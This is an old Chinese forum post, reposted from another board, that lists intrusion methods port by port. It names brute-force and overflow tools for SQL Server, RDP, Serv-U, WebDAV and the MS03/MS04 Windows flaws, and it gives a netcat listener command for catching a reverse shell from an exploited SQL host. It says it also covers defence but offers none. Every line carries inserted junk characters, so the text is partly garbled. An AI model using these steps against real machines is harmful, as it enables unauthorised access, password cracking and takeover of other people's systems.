|
|
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。 , f" t7 }3 J6 H7 p( m- N; F4 m
7 G# W f9 V8 w
6 y: R/ Z' a% M3 O
1. 1433端口入侵 # D% k5 m Q/ f) x4 H0 |
1 t: j5 _) L1 c, y# o$ F
scanport.exe 查有1433的机器
1 @7 Q" ?' Z, V8 N! s3 W0 q: a7 `9 D$ R) k! x7 i P
SQLScanPass.exe 进行字典暴破(字典是关键) # J! M3 w; g- Z5 `& b6 y) g; F
4 R. k( E. m# C( d. }' N3 h/ \; I
最后 SQLTools.exe入侵
8 N2 X$ k2 E1 M+ P8 r9 b+ l
7 z6 y% y' S( A Z" x =============================
+ O6 M3 ^, I' U' Y/ T$ J' F1 [$ a) o) k0 u
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
4 L# T+ D7 j& c r! ]5 l3 i2 R' a( H/ j# t9 l3 e
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
. u) w$ z0 j- { T
# W( ^) L1 k0 V4 n1 \! g (以上反向的,测试成功) : l# h2 v, a v
% k7 z2 u" F3 T! Q1 Q6 Y4 e sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
! v. D! e0 c0 F( h( M: |
7 e, q* ^4 p# j 2. 4899端口入侵
2 Z# N$ ]; ]2 a' ? Y9 C0 n# d' r
用4899过滤器.exe,扫描空口令的机器 / f4 l" C2 v/ c3 v
$ r; ^+ v! F: V! U; C" w
3. 3899的入侵 ; `( i" K$ x3 I1 [3 ?" E! w9 ^- Z
8 E% ]; T* m& {6 ^* T# ^
对很早的机器,可以试试3389的溢出(win3389ex.exe) , c, H, X6 k. s9 r/ U
2 p) G$ `; z! A- k- K" _& A# f
对2000的机器,可以试试字典暴破。(tscrack.exe) % E! ~2 a6 ]' n8 Q2 h
- M( {0 n( p1 ^8 m$ U# t
4. 80入侵
9 L; Z- ]2 R+ j0 h/ ]7 i
) M# A- H& b, U* i 对sp3以前的机器,可以用webdav入侵;
5 D- [( v* U$ b+ t% t& ?! |; D7 U' I( A
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
2 p* c% V& i, d9 _0 D9 N1 C4 E, p' n
8 t$ `$ L0 P9 O 可以利用SQL进行注入。(小榕的注入软件)。 " v) ` r3 r* w4 K% M
; \0 ^- y* J) |% R% K( x( r! g
5. serv-u入侵(21端口)
% w: I6 R+ x. I" s+ @6 b7 F8 a x9 O6 r
对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 4 u* c' n% W8 B9 W0 P4 Q
! X' l% X R! Z' V
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 2 K2 C( o, ~: c% w% \1 _: o
! W/ v3 M( L: b
======================================
5 B' @, w& F4 _* _" q) {
0 V8 X$ S8 N0 r0 z3 A 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 8 z I! a' O! u) p6 D3 }
y: l/ z6 L' f# x 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A 5 }" |: B/ G/ N; l* t
" T4 ~6 m" d! `; ~' q5 F 6. 554端口
; Q. M- V) r8 U5 y7 o, s8 y4 ^ M1 n! ?2 {; {8 o# \7 @4 {0 E7 m B
用real554.exe入侵。 9 n [; [- m% w5 A8 d
& ~3 B5 X* ?4 `$ Q6 V2 }" K; p7 S) @
7. 6129端口
1 g) a+ M! ~$ d! d! q
% ~9 c" K+ T0 t$ a+ H 用DameWare6129.exe入侵。
( Z9 G& o& h9 B' o7 j. n
. s& W1 H- a/ _! ?' K 8. 系统漏洞 0 l9 W/ }0 T/ }$ G8 G$ Z7 H1 e e
& M( `, v- |/ l+ n9 f. C" C
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, ( `- L) Q. `8 \6 r; L7 P
5 J0 J9 M/ r& X% w0 @) @ 进行溢出入侵。 + G6 x4 [# `' q7 U
2 t5 \! g) O! C: c N% @
9. 3127等端口 . I& F% J6 p% g$ g. j' j2 P
+ E0 k% X, h/ F& [1 @- D
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
3 m/ U% J2 j' H) y
; Y* P1 I# K! B3 f+ u% s! x/ A; U 10. 其他入侵
# U6 t3 V& u0 Z+ a! ]' f5 e
3 ], ~0 _& w$ n 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
" ^- W6 N% T) J# p1 j! P5 A- ^ J: Y
| 转自杜松论坛:http://www.juniperbbs.net/index.php |
|
|
/1 
IP卡
狗仔卡
发表于 2007-12-17 01:04:27
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
